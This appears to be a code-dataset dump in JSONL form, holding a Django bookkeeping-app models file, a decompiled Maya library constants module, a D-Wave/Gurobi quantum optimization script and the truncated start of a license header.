'Error in group'\n oCount['id'] = group\n oCount['count'] = count+1\n oStatus.set(\"group\", oCount=oCount)\n # Finish off nicely\n oStatus.set(\"finished\", oCount=oCount)\n response['status'] = 'ok'\n response['msg'] = 'From the {} transactions, {} have been synchronized'.format(total, count)\n else:\n response['msg'] = 'this project has no synchronisation set'\n except:\n response['msg'] = oErr.get_error_message()\n return response\n\n\nclass Organization(models.Model):\n \"\"\"Information on the organization for whom the accounting is\"\"\"\n\n # [1] Obligatory organization name\n name = models.CharField(\"Organization's name\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n # [0-1] Optional address lines\n streetname = models.TextField(\"Street name\", blank=True, null=True)\n streetnumber = models.TextField(\"Number\", blank=True, null=True)\n zipcode = models.TextField(\"Zip code\", blank=True, null=True)\n city = models.TextField(\"City\", blank=True, null=True)\n email = models.EmailField(\"E-mail address\", blank=True, null=True)\n phone = models.TextField(\"Phone number\", blank=True, null=True)\n\n\nclass Project(models.Model):\n \"\"\"Information on the organization for whom the accounting is\"\"\"\n\n # [1] Obligatory organization Link\n org = models.ForeignKey(Organization)\n # [1] Obligatory bookkeeping year\n year = models.IntegerField(\"Bookkeeping year\", blank=False, null=False)\n # [0-1] Excel import file used (if any)\n source = models.TextField(\"Excel source file\", blank=True, null=True)\n # [0-1] Excel export file used\n target = models.TextField(\"Excel target file\", blank=True, null=True)\n # [0-1] A project can have a vault for synchronization\n vault = models.ForeignKey(Vault, blank=True, null=True)\n\n def __str__(self):\n return \"{}_{}\".format(self.org.name, self.year)\n\n def short(self):\n return \"{}_{}\".format(self.org.name, self.year)\n\n def get_balance_type(self, sType):\n type_number = choice_value(BALANCE_TYPE, sType)\n return type_number\n\n def get_absolute_url(self):\n return reverse('project_detail', kwargs={'pk': self.pk})\n\n def get_project(sOrgName, iYear):\n # Get the organization\n org = Organization.objects.filter(name=sOrgName).first()\n if org == None:\n return None\n prj = Project.objects.filter(org=org, year=iYear).first()\n return prj\n\n def clean_transactions(self, num=None, side=None):\n 
\"\"\"Remove all the transactions of this project\"\"\"\n\n if num==None and side==None:\n qs = self.transactions.all()\n elif num!=None and side != None:\n account = self.accounts.filter(number=num).first()\n if side == 'debet':\n qs = self.transactions.filter(project=self, debet=account)\n elif side == 'credit':\n qs = self.transactions.filter(project=self, credit=account)\n qs.delete()\n # Return positively\n return True\n\n def clean_persons(self):\n \"\"\"Remove all the transactions of this project\"\"\"\n\n qs = Person.objects.filter(project=self)\n qs.delete()\n # Return positively\n return True\n\n def add_transgroup(self, doc=\"\", date=None, description=\"\", batch=\"\"):\n\n oErr = ErrHandle()\n tgroup = None\n groupnum = 0\n try:\n # Validate the required parameters\n if date == None:\n return None\n\n # Create one\n tgroup = TransGroup(project=self, date=date, description=description,\n doc=doc, group=groupnum, batch=batch)\n tgroup.save()\n # Return the tgroup object\n return tgroup\n except:\n sMsg = oErr.get_error_message()\n return None\n\n def add_transaction(self, debet=None, credit=None, \n batch=\"\", tgroup=None, amount=0.0, person=None, local=0.0, \n rate=1.0, valuta=\"EUR\", extra=\"{}\"):\n \"\"\"Add one transaction with optional parameters\"\"\"\n\n oErr = ErrHandle()\n lSide = ['db', 'cr']\n try:\n # Validate the required parameters\n if tgroup == None or (debet == None and credit == None) or (amount == 0.0 and local == 0.0):\n return None\n\n # CHeck if valuta conversion is needed\n if local == 0.0 and amount != 0.0:\n local = amount\n elif local != 0.0 and amount == 0.0:\n # NOTE: divide by rate (e.g. CFA 3.400.500 / 655 = EUR 5191,60)\n amount = local / rate\n\n # Create two transactions: one for debet, one for credit\n for side in lSide:\n account = debet if side == \"db\" else credit\n transaction = Transaction(project=self, tgroup=tgroup, sync=\"false\",\n account=account, side=side, amount=amount, \n local=local, rate=rate, valuta=valuta,\n extra=extra, person=person)\n # Save it\n transaction.save()\n\n # Possibly add default group\n if tgroup.group == 0:\n tgroup.group = transaction.id\n tgroup.save()\n # And return the created transaction\n return transaction\n except:\n sMsg = oErr.get_error_message()\n return None\n\n def read_from_excel(self, sFileName, arErr, sType=\"\", sSoort=\"\"):\n response = False\n # Action depends on the type\n if sType == \"2017\":\n response = import_excel_2017(self, sFileName, sSoort, arErr)\n \n return response\n\n def read_data(self, data_file, arErr, sSoort):\n \"\"\"Read the data from [data_file] of type [sSoort] into project [self]\"\"\"\n\n oBack = import_data_file(self, data_file, sSoort, arErr)\n return oBack \n\n def copy_account(self, acct_prev):\n \"\"\"Copy the previous account to a new one\"\"\"\n\n # Validate\n if acct_prev == None: return False\n # Check purpose\n purp_prev = acct_prev.purpose\n purp = self.purposes.filter(name=purp_prev.name).first()\n if purp == None and purp_prev != None:\n purp = Purpose(project=self, name=purp_prev.name,\n code=purp_prev.code, exp_line=purp_prev.exp_line,\n descr=purp_prev.descr)\n purp.save()\n # Create a new account\n acct_new = Account(project=self, name=acct_prev.name, number=acct_prev.number,\n descr=acct_prev.descr, purpose=purp, \n balance=acct_prev.balance, saldo=0.0)\n # Optional additions\n if acct_prev.reservering != \"\" and acct_prev.reservering != None:\n acct_new.reservering = acct_prev.reservering\n if acct_prev.balline != \"\" and acct_prev.balline != 
None:\n acct_new.balline = acct_prev.balline\n # Save it\n result = acct_new.save()\n # Return this\n return acct_new\n\n def get_preceding(self):\n \"\"\"Get project from the preceding year\"\"\"\n iYear = int(self.year)\n prec_year = iYear-1\n prec = Project.objects.filter(org=self.org, year=prec_year).first()\n return prec\n\n def get_account(self, number):\n \"\"\"Get (and possibly create) the account with the indicated number\"\"\"\n\n account = self.accounts.filter(number=number).first()\n if account == None: \n # Check if there is a project from the previous year\n prec_prj = self.get_preceding()\n if prec_prj == None:\n return None\n # Try copy the account from the previous year\n prev_acct = prec_prj.accounts.filter(number=number).first()\n if prev_acct == None:\n return None\n account = self.copy_account(prev_acct)\n # Return the result\n return account\n\n def get_account_iban(self, iban):\n \"\"\"Get (and possibly copy from previous year) the account with the indicated IBAN\"\"\"\n\n account = self.accounts.filter(iban=iban).first()\n if account == None: \n # Check if there is a project from the previous year\n prec_prj = self.get_preceding()\n if prec_prj == None:\n return None\n # Try copy the account from the previous year\n prev_acct = prec_prj.accounts.filter(iban=iban).first()\n if prev_acct == None:\n return None\n account = self.copy_account(prev_acct)\n # Return the result\n return account\n\n def get_person(self,sPerson, sIban):\n \"\"\"Retrieve this person\"\"\"\n\n # ONLY look at the IBAN to get a person\n person = self.org.persons.filter(iban=sIban).first()\n if person == None:\n # Check if this is a known account \n account = self.accounts.filter(iban=sIban).first()\n if account != None:\n sPerson = account.name\n # Add this one TO THE ORGANISZTION\n person = Person(name=sPerson, \n iban=sIban, \n org=self.org,\n sync='false')\n person.save()\n return person\n\n def get_purpose_list(self):\n purpose_ids = [item.purpose.id for item in self.accounts.all()]\n purpose_list = Purpose.objects.filter(id__in=purpose_ids).order_by(\"name\")\n return purpose_list\n\n\nclass Personal(models.Model):\n \"\"\"Details of currently active user\"\"\" \n\n # [1] THere has to be a user, that is the basis\n user = models.ForeignKey(User, blank=False, null=False)\n # [0-1] Each user should have chosen his 'current' project\n project = models.ForeignKey(Project, blank=True, null=True)\n\n def __str__(self):\n # REturn my unique identification: username, organisation and year\n return \"{}_{}_{}\".format(self.user.username, self.org.name, self.year)\n\n\nclass Purpose(models.Model):\n \"\"\"The purpose of income or expense\"\"\"\n\n # [1] Each purpose must have a name\n name = models.CharField(\"Name\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n # [1] Each purpose must have a code string\n code = models.CharField(\"leadCode\", max_length=MAX_TEXT_LEN, blank=False, null=False, default=\"00\")\n # [1] Each account takes a place in the expense overview\n exp_line = models.IntegerField(\"Expense line\", default=-1)\n # [0-1] Description\n descr = models.TextField(\"Description\", blank=True, default=\"\")\n # [1] Obligatory link to a project\n project = models.ForeignKey(Project, blank=False, null=False, related_name='purposes')\n\n def __str__(self):\n return \"{}-{}: {}\".format(self.project.org.name, self.project.year, self.name)\n\n\nclass BalLine(models.Model):\n \"\"\"Line within the Balance\"\"\"\n\n # [1] Each line must have a name\n name = models.CharField(\"Name\", 
max_length=MAX_TEXT_LEN, blank=False, null=False)\n # [1] Order of this line in the balance\n order = models.IntegerField(\"Order\", default=0)\n # [1] Is this line in the 'activa' or the 'passiva' section?\n side = models.CharField(\"Balanszijde\", choices=build_choice_list(BALANCE_SIDE), \n max_length=5, default=0)\n # [1] Obligatory link to a project\n project = models.ForeignKey(Project, blank=False, null=False, related_name='ballines')\n\n def __str__(self):\n return self.name\n\n\nclass Account(models.Model):\n \"\"\"One account in bookkeeping terms\"\"\"\n\n # [1] Each account must have a name and a number\n name = models.CharField(\"Naam\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n number = models.IntegerField(\"Nummer\", default = 500)\n # [0-1] Account under which this one resides (if any)\n parent = models.ForeignKey(\"Account\", blank=True, null=True, related_name='parent_account')\n # [0-1] Physical accounts may have an IBAN\n iban = models.CharField(\"IBAN\", max_length=MAX_TEXT_LEN, blank=True, null=True)\n # [1; o] Description in plain text of this account\n descr = models.TextField(\"Beschrijving\", blank=False, null=False)\n # [1] Obligatory specific-purpose (but the value can be \"none\")\n purpose = models.ForeignKey(Purpose, verbose_name=\"Doelstelling specifiek\", blank=False, null=False, related_name=\"specificpurpose\")\n # [0-1] Nummer van de reserveringsregel onder welke dit account hoort\n reservering = models.IntegerField(\"Reserveringsnummer\", blank=True, null=True)\n # [0-1] If this is Income/Expense: line for this account in the Liabilities section\n balline = models.ForeignKey(BalLine, verbose_name=\"Balansregel\", blank=True, null=True)\n # [1] Obligatory balance position: Activa, Passiva, Lasten, Baten\n balance = models.CharField(\"Balansonderdeel\", choices=build_choice_list(BALANCE_TYPE), \n max_length=5, default=0)\n # [1] Each account (for a project) has a starting saldo\n saldo = models.FloatField(\"Beginsaldo\", default=0.0)\n # [1] Obligatory side of the saldo\n saldoside = models.CharField(\"Debet or credit\", choices=build_abbr_list(ENTRY_SIDE), max_length=5, default='db')\n # [1] Obligatory boolean: use for expenses\n useforexp = models.BooleanField(\"Gebruiken bij uitgaven\", default=True)\n # [1] Obligatory boolean: use for income\n useforinc = models.BooleanField(\"Gebruiken bij inkomsten\", default=True)\n # [1] Obligatory link to a project\n project = models.ForeignKey(Project, blank=False, null=False, related_name='accounts')\n\n def __str__(self):\n return \"{}\".format(self.number)\n\n def parent_in(self):\n sFull = \"\"\n if self.parent != None:\n sFull = \"{}: {}\".format(self.parent.number, self.parent.name)\n return sFull\n\n def get_acctp(self):\n \"\"\"Calculate the accounttype as intended for auditfile 3.2\"\"\"\n accTp = \"\"\n # Get the current balance type\n sBalance = choice_abbreviation(BALANCE_TYPE, self.balance)\n if sBalance == \"act\" or sBalance == \"pas\":\n # Activa or Passiva --> B\n accTp = \"B\"\n elif sBalance == \"bat\" or sBalance == \"las\":\n # Baten or Lasten --> P (=profite/loss)\n accTp = \"P\"\n else:\n # Mixed\n accTP = \"M\"\n\n return accTp\n\n def group(self):\n g = str(self.number) if self.parent == None else str(self.parent.number)\n return g\n\n def full_path(self):\n \"\"\"Provide the full path including my own number\"\"\"\n\n oErr = ErrHandle()\n path = \"\"\n history = [] # Note all accounts we have had\n try:\n history.append(self.number)\n item = self.parent\n while item != None and 
item.number not in history:\n history.append(item.number)\n path = \"/\" + str(item.number) + path\n item = item.parent\n # Add the name itself to the path\n path = path + \"/\" + str(self.number)\n path = path.lower()\n except:\n msg = oErr.get_error_message()\n path = \"\"\n return path\n\n def group_parent(self):\n \"\"\"Get the parent of the group I belong to \"\"\"\n if self.parent == None or self.parent.parent == None:\n return None\n else:\n return self.parent.parent.number\n\n def group_depth(self):\n \"\"\"Get the amount of parents above me\"\"\"\n\n depth = 0\n item = self.parent\n history = [] # Note all accounts we have had\n while item != None and item.number not in history:\n history.append(item.number)\n depth += 1\n item = item.parent\n # Return the depth we found\n return depth\n\n def group_path(self):\n \"\"\"Return the path above me\"\"\"\n\n path = \"\"\n oErr = ErrHandle()\n history = [] # Note all accounts we have had\n try:\n history.append(self.number)\n item = self.parent\n while item != None and item.number not in history:\n history.append(item.number)\n path = \"/\" + str(item.number) + path\n item = item.parent\n path = path.lower()\n except:\n msg = oErr.get_error_message()\n path = \"\"\n return path\n\n def has_children(self):\n fchild = self.project.accounts.filter(parent=self).first()\n return fchild != None\n \n\nclass Person(models.Model):\n \"\"\"Sponsor or other person that can be associated with a transaction\"\"\"\n\n # [1] Each person must have a name and an IBAN\n name = models.CharField(\"Naam\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n iban = models.CharField(\"IBAN\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n # [1] Any notes associated with this person\n notes = models.TextField(\"Opmerkingen\", blank=True, default=\"\")\n # [1] Obligatory synchronisation status\n sync = models.CharField(\"Sync status\", max_length=20, default=\"true\")\n # [1] Obligatory link to an organization\n org = models.ForeignKey(Organization, blank=False, null=False, related_name='persons')\n\n def __str__(self):\n return \"{}\".format(self.name)\n\n\nclass TransGroup(models.Model):\n \"\"\"A group of transactions that together amount to zero\"\"\"\n\n # [1] Documentation string or number\n doc = models.TextField(\"Documentation\", blank=True, default=\"\")\n # [0-1] Group number: all transactions with the same number belong together and must together be 0\n group = models.IntegerField(\"Group\", blank=True, null=True)\n # [0-1] Batch: identification of one batch: transactions belong together\n batch = models.CharField(\"Batch\", max_length=MAX_TEXT_LEN, blank=True, default=\"\")\n # [1] Date \n date = models.DateTimeField(\"Date\", default=timezone.now)\n # [0-1] Description\n description = models.TextField(\"Description\", blank=True, default=\"\")\n # [1] Obligatory link to a project\n project = models.ForeignKey(Project, null=True, related_name='transgroups')\n\n def __str__(self):\n sShort = \"{}\".format(self.group)\n return sShort\n\n\nclass Transaction(models.Model):\n \"\"\"Transfer from one account to another one\"\"\"\n\n # [1] Obligatory side of the entry\n side = models.CharField(\"Debet or credit\", choices=build_abbr_list(ENTRY_SIDE), max_length=5, default='0')\n # [1] The account that needs to be charged at the indicated side\n account = models.ForeignKey(Account, null=True, related_name=\"account_transactions\")\n # [1] Pointer to transgroup\n tgroup = models.ForeignKey(TransGroup, null=True, related_name=\"group_transactions\")\n\n 
# [0-1] Conscribo identifier (if applicable; 'boekstuknummer')\n transactionNr = models.CharField(\"Boekstuk nummer\", blank=True, null=True, max_length=MAX_TEXT_LEN)\n # [1] The local amount (in local currency)\n local = models.FloatField(\"Bedrag in valuta\", blank=False, null=False, default=0.0)\n # [1] Valuta die gebruikt wordt\n valuta = models.CharField(\"Valuta\", max_length=MAX_TEXT_LEN, default=\"EUR\")\n # [1] Exchange rate\n rate = models.FloatField(\"Wisselkoers\", default=1.0)\n # [1] The amount of the transfer (in Euro's)\n amount = models.FloatField(\"Amount\", blank=False, null=False)\n # [0-1] Optional person associated \n person = models.ForeignKey(Person, blank=True, null=True)\n # [0-1]\n extra = models.TextField(\"Additional information\", default=\"\")\n # [1] Obligatory synchronisation status\n sync = models.CharField(\"Sync status\", max_length=20, default=\"true\")\n # [1] Obligatory link to a project\n project = models.ForeignKey(Project, blank=False, null=False, related_name='transactions')\n\n def __str__(self):\n sShort = \"{}-{}: {}\".format(self.debet, self.credit, self.amount)\n return sShort\n\n def get_currency(self):\n if self.valuta == \"CFA\":\n return \"XOF\"\n else:\n return self.valuta\n\n def get_side_html(self):\n color= \"red\" if self.side == \"cr\" else \"green\"\n name = \"Credit\" if self.side == \"cr\" else \"Debet\"\n return \"{}\".format(color, name)\n\n def debit_project(self):\n \"\"\"If this transaction has a purpose A-F, return that\"\"\"\n\n purpose = self.debet.purpose.name\n sCheck = purpose.lower()\n if \"doelstelling\" in sCheck or \"algemeen\" in sCheck:\n return purpose\n else:\n return \"\"\n\n def credit_project(self):\n \"\"\"If this transaction has a purpose A-F, return that\"\"\"\n \n purpose = self.credit.purpose.name\n sCheck = purpose.lower()\n if \"doelstelling\" in sCheck or \"algemeen\" in sCheck:\n return purpose\n else:\n return \"\"\n\n\n def get_row(self):\n debet = \"\" if self.debet == None else str(self.debet.number)\n credit = \"\" if self.credit == None else str(self.credit.number)\n person = \"\" if self.person == None else self.person.name\n arRow = []\n arRow.append(self.id)\n arRow.append(self.doc)\n arRow.append(self.group)\n arRow.append(self.batch)\n arRow.append(self.date)\n arRow.append(self.description)\n arRow.append(debet)\n arRow.append(credit)\n arRow.append(self.local)\n arRow.append(self.valuta)\n arRow.append(self.rate)\n arRow.append(self.amount)\n arRow.append(person)\n return arRow\n\n def get_outputColumns():\n outputColumns = ['id', 'doc', 'group', 'batch', 'date', 'description', \n \"debet\", \"credit\", \"local\", \"valuta\",\n \"rate\", \"amount\", \"person\"]\n return outputColumns\n\n\nclass TransRule(models.Model):\n \"\"\"Rule to process a transaction automatically\"\"\"\n\n source = models.ForeignKey(Account, blank=False, null=False, related_name=\"basisrekening\")\n target = models.ForeignKey(Account, blank=False, null=False, related_name=\"tegenrekening\")\n action = models.CharField(\"Bij- of afschrijving\", choices=build_choice_list(EXPENSE_TYPE), \n max_length=5, default=0)\n person = models.ForeignKey(Person, blank=True, null=True)\n omschrijving = models.TextField(\"Woord(en) in de omschrijving\", blank=True, default=\"\")\n\n def __str__(self):\n return self.id\n\n def bankrekening(self):\n return self.source.name\n\n def tegenrekening(self):\n return self.target.name\n\n\nclass Status(models.Model):\n \"\"\"Intermediate loading of /crpp information and status of 
processing it\"\"\"\n\n # [1] Status of the process\n status = models.CharField(\"Status of synchronization\", max_length=50)\n # [1] Counts (as stringified JSON object)\n count = models.TextField(\"Count details\", default=\"{}\")\n # [0-1] Synchronisation type\n type = models.CharField(\"Type\", max_length=255, default=\"\")\n # [0-1] User\n user = models.CharField(\"User\", max_length=255, default=\"\")\n # [0-1] Error message (if any)\n msg = models.TextField(\"Error message\", blank=True, null=True)\n\n def __str__(self):\n # Refresh the DB connection\n self.refresh_from_db()\n # Only now provide the status\n return self.status\n\n def set(self, sStatus, oCount = None, msg = None):\n self.status = sStatus\n if oCount != None:\n self.count = json.dumps(oCount)\n if msg != None:\n self.msg = msg\n self.save()\n","sub_path":"doubenfi/doubenfi/finance/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":39479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"360011204","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/tpMayaLib/core/common.py\n# Compiled at: 2020-01-16 21:52:40\n# Size of source mod 2**32: 560 bytes\n\"\"\"\nModule that contains common definitions for tpMayaLib\n\"\"\"\nfrom __future__ import print_function, division, absolute_import\nPIVOT_ARGS = dict(rp=['rp', 'r', 'rotate', 'rotatePivot', 'pivot'], sp=['scale', 's', 'scalePivot'], local=[\n 'l', 'translate'],\n boundingBox=['bb', 'bbCenter'],\n axisBox=['ab'],\n closestPoint=[\n 'cpos', 'closest', 'closestPoint'])\nSPACE_ARGS = {'object':[\n 'os', 'objectSpace', 'o'], \n 'world':['w', 'worldSpace', 'ws'], 'local':['l', 'translate']}","sub_path":"pycfiles/tpmayalib-0.0.17-py3.6/common.cpython-36.py","file_name":"common.cpython-36.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"142992415","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# $ vim ~/.config/dwave/dwave.conf\n# $ time nice -n 20 python quant_opt.py\n# $ for i in {0..9}; do python quant_opt.py; done\n\nimport gc\nimport dwave_networkx as dnx\nfrom quant_solver import QuantSolver\nfrom store_object import StoreObject\nfrom benchmarks import Benchmarks\n\nfrom itertools import product\n\nimport dimod\nfrom dwave.system.samplers import DWaveSampler\n\nfrom dwave.system.composites import FixedEmbeddingComposite\nfrom minorminer import find_embedding\nfrom dwave.embedding import embed_qubo\n\n\n\ndef run_solver(lv, qm, id_pr, newemb=0, id_solver=1, optimal_value=0, runs=10, ex_type=0, id_model=0, model=None):\n\tresponse = None\n\tqr = QuantSolver(id_pr, id_solver, optimal_value, runs, ex_type, id_model, model)\n\tbqm = qr.run_Setup(lv, qm, newemb)\n\n\tif runs > 0: # send to quantum machine\n\t\tif id_solver == 1: # Direct\n\t\t\tprint('', '#' * 50, ' DIRECT', '#' * 50, '', sep='\\n')\n\t\t\tresponse = qr.run_Direct(bqm)\n\t\telif id_solver == 2: # QBsolv\n\t\t\tprint('', '#' * 50, ' QBSOLV', '#' * 50, '', sep='\\n')\n\t\t\tresponse = qr.run_QBsolv(bqm)\n\t\telif id_solver == 3: # Hybrid\n\t\t\tprint('', '#' * 50, ' HYBRID', '#' * 50, '', sep='\\n')\n\t\t\tresponse = qr.run_Hybrid(bqm)\n\n\tdel qr\n\treturn response\n\n\ndef run_model(qm, newemb=0, id_solver=1, runs=10, ex_type=0, id_model=0, model=None):\n\tprint('', '#' * 50, model, 
'#' * 50, '', sep='\\n')\n\n\tif True: # Run Gurobi\n\t\t#print('', '#' * 50, ' GUROBI', '#' * 50, '', sep='\\n')\n\t\t# First initialize the benchmarks object\n\t\tbn = Benchmarks()\n\t\t\n\t\tsol_Gurobi_QUBO, opt_val_Gurobi_QUBO, status_Gurobi_QUBO = bn.gurobi_solve_QUBO(qm)\n\t\tprint(\"Gurobi QUBO optimal value: {}\".format(opt_val_Gurobi_QUBO))\n\n\t\tsol_Gurobi_penaltyQuadratic, opt_val_Gurobi_penaltyQuadratic, status_Gurobi_penaltyQuadratic = bn.gurobi_solve_penaltyQuadratic(qm)\n\t\tprint(\"Gurobi Penalty Quadratic optimal value: {}\".format(opt_val_Gurobi_penaltyQuadratic))\n\n\t\tsol_Gurobi_Quadratic, opt_val_Gurobi_Quadratic, iterations, status_Gurobi_Quadratic = bn.gurobi_solve_QuadraticRecursive(qm)\n\t\tprint(\"Gurobi Quadratic optimal value ({} iterations): {}\".format(iterations, opt_val_Gurobi_Quadratic))\n\n\t\tsol_Gurobi_MILP, opt_val_MILP, status_Gurobi_MILP = bn.gurobi_solve_MILP(qm)\n\t\tprint(\"Gurobi Original MILP optimal value: {}\".format(opt_val_MILP))\n\n\t\tdel bn\n\n\tif True:\n\t\tfor i in range(0, 1): # SETUP: Generate Several Tests with new BQM, Embeddings, Experiments\n\t\t\tprint('#' * 50, ' RUN SOLVER', (i + 1), '#' * 50)\n\t\t\tresponse = run_solver(qm.H0b, qm.Hb, qm.id_pr, newemb, id_solver, opt_val_Gurobi_QUBO, runs, ex_type, id_model, model) # Run Solver\n\t\t\t# select id, id_emb, runs, energy_min, p01, p02, p03, p04, p05, p1, p2, p3, p4, p5 from experiments order by p01 desc, p03 desc, p05 desc, p1 desc, p2 desc, p3 desc;\n\n\tif False: # Save Object Response\n\t\tso = StoreObject()\n\t\tso.pickle_save(response, model)\n\t\tdel so\n\n\tprint('', '#' * 50, ' END', '#' * 50, '', sep='\\n')\n\tgc.collect()\n\treturn(opt_val_Gurobi_QUBO, \n\t\t\t opt_val_Gurobi_penaltyQuadratic, \n\t\t\t opt_val_Gurobi_Quadratic,\n\t\t\t opt_val_MILP, \n\t\t\t status_Gurobi_QUBO, \n\t\t\t status_Gurobi_penaltyQuadratic, \n\t\t\t status_Gurobi_Quadratic, \n\t\t\t status_Gurobi_MILP)\n\n\ndef run_model_simple(qm, newemb=0, id_solver=1, runs=10, ex_type=0, id_model=0, model=None, gurobi_single=0, quantum=0, gurobi_embedded=0):\n\tprint('', '#' * 50, model, '#' * 50, '', sep='\\n')\n\t\n\t# Some necessary initialization\n\topt_val_Gurobi_DWaveQUBO = 0.0\n\topt_val_D_Wave_QUBO = 0.0\n\topt_val_gurobi_embedded = 0.0\n\tstatus_Gurobi_DWaveQUBO = 0\n\tstatus_DWave_Qubo = 0\n\tstatus_gurobi_embedded = 0\n\t\n\tbn = Benchmarks()\n\t\n\tsol_Gurobi_QUBO, opt_val_Gurobi_QUBO, status_Gurobi_QUBO = bn.gurobi_solve_QUBO(qm)\n\tprint(\"Gurobi QUBO optimal value: {}\".format(opt_val_Gurobi_QUBO))\n\n\tsol_Gurobi_penaltyQuadratic, opt_val_Gurobi_penaltyQuadratic, status_Gurobi_penaltyQuadratic = bn.gurobi_solve_penaltyQuadratic(qm)\n\tprint(\"Gurobi Penalty Quadratic optimal value: {}\".format(opt_val_Gurobi_penaltyQuadratic))\n\n\tsol_Gurobi_Quadratic, opt_val_Gurobi_Quadratic, iterations, status_Gurobi_Quadratic = bn.gurobi_solve_QuadraticRecursive(qm)\n\tprint(\"Gurobi Quadratic optimal value ({} iterations): {}\".format(iterations, opt_val_Gurobi_Quadratic))\n\n\tsol_Gurobi_MILP, opt_val_MILP, status_Gurobi_MILP = bn.gurobi_solve_MILP(qm)\n\tprint(\"Gurobi Original MILP optimal value: {}\".format(opt_val_MILP))\n\t\n\tif gurobi_single == 1:\n\t\tsol_Gurobi_DWaveQUBO, opt_val_Gurobi_DWaveQUBO, status_Gurobi_DWaveQUBO = bn.gurobi_solve_DWaveQUBO(qm)\n\t\tprint(\"Gurobi D-Wave QUBO optimal value: {}\".format(opt_val_Gurobi_DWaveQUBO))\t\n\t\n\t\n\tif quantum == 1:\n\t\tfor i in range(5):\n\t\t\ttry:\n\t\t\t\topt_val_D_Wave_QUBO, status_DWave_Qubo, embedded = run_solver_simple(qm, 
runs)\n\t\t\t\tprint(\"D-Wave QUBO optimal value: {}\".format(opt_val_D_Wave_QUBO))\n\t\t\t\t\n\t\t\t\tif gurobi_embedded == 1:\n\t\t\t\t\tsol_gurobi_embedded, opt_val_gurobi_embedded, status_gurobi_embedded = bn.gurobi_solve_DWaveEmbedded(qm, embedded)\n\t\t\t\t\tprint(\"Gurobi Embedded optimal value: {}\".format(opt_val_gurobi_embedded))\n\t\t\t\tbreak\n\t\t\t\n\t\t\texcept:\n\t\t\t\tcontinue\t\n\t\t\t\n\tprint('', '#' * 50, ' END', '#' * 50, '', sep='\\n')\n\t\n\treturn(opt_val_Gurobi_QUBO, \n\t\t\t opt_val_Gurobi_penaltyQuadratic, \n\t\t\t opt_val_Gurobi_Quadratic,\n\t\t\t opt_val_MILP,\n\t\t\t opt_val_Gurobi_DWaveQUBO,\n\t\t\t opt_val_D_Wave_QUBO,\n\t\t\t opt_val_gurobi_embedded,\n\t\t\t status_Gurobi_QUBO, \n\t\t\t status_Gurobi_penaltyQuadratic,\n\t\t\t status_Gurobi_Quadratic,\n\t\t\t status_Gurobi_MILP, \n\t\t\t status_Gurobi_DWaveQUBO,\n\t\t\t status_DWave_Qubo,\n\t\t\t status_gurobi_embedded)\n\n\ndef run_solver_simple(qm, runs):\n\t# Set some important D-Wave parameters\n\tchain_strength = 35\n\tannealing_time_mult = 2\t\n\t\n\t# Set linear vector and quadratic matrix\n\tLV = qm.H0b\n\tQM = qm.Hb\n\t\n\t# Dictionaries of Linear and Quadratic Coefficients {(1,1):21, (2,2): 62, ...} Such that:\n\t# 1. We do not assume that the matrix is symmetric\n\t# 2. We remove quadratic pairs with value = 0.0\n\tdlv = {(t, t): LV[t][0] + QM[t, t] for t in range(len(LV))} \t\n\tdqm = {t: QM[t[0],t[1]] + QM[t[1],t[0]] \n\t\t\t for t in filter(lambda t: t[1]>t[0], product(range(len(QM)), repeat=2)) if QM[t[0],t[1]]!=0.0}\n\t\n\t# Get binary quadratic matrix from the linear and quadratic dictionaries\n\tbqm = dict(dlv)\n\tbqm.update(dqm)\n\t\n\t# Set solver (sampler) to D-Wave QPU\n\tsampler = DWaveSampler(solver={'qpu': True})\n\t\n\t# Get the sampler structure from D-Wave machine.\n\ttarget_edgelist = sampler.edgelist\n\t\n\t# Find embedding on D-Wave and Map to the sampler\n\temb = find_embedding(bqm, target_edgelist, verbose=0)\n\tcomposite = FixedEmbeddingComposite(sampler, emb)\n\t\n\t# Create the embedded graph to send back for other processes\n\tchimera = dnx.chimera_graph(16, 16, 4)\n\tembedded = embed_qubo(bqm, emb, chimera, chain_strength)\t\n\t\t\n\t# Get results from sampling the D-Wave QPU\n\tresponse = composite.sample_qubo(bqm, \n\t\t\t\t\t\t\t\t\t\t\t\tnum_reads = runs, \n\t\t\t\t\t\t\t\t\t\t\t\tanswer_mode = 'raw', \n\t\t\t\t\t\t\t\t\t\t\t\tchain_strength = chain_strength, \n\t\t\t\t\t\t\t\t\t\t\t\tannealing_time = 20*annealing_time_mult, \n\t\t\t\t\t\t\t\t\t\t\t\tauto_scale = True)\n\t\t\n\treturn response.first.energy+qm.bias, response.first.chain_break_fraction, embedded\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\tprint('Quantum Optimization')","sub_path":"quant_opt.py","file_name":"quant_opt.py","file_ext":"py","file_size_in_byte":7254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"381461717","text":"\"\"\"\n****************************************************************************************************\n:copyright (c) 2019-2021 URBANopt, Alliance for Sustainable Energy, LLC, and other contributors.\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification, are permitted\nprovided that the following conditions are met:\n\nRedistributions of source code must retain the above copyright notice, this list of conditions\nand the following disclaimer.\n\nRedistributions in binary form must reproduce the above copyright notice, this list of conditions\nand the 
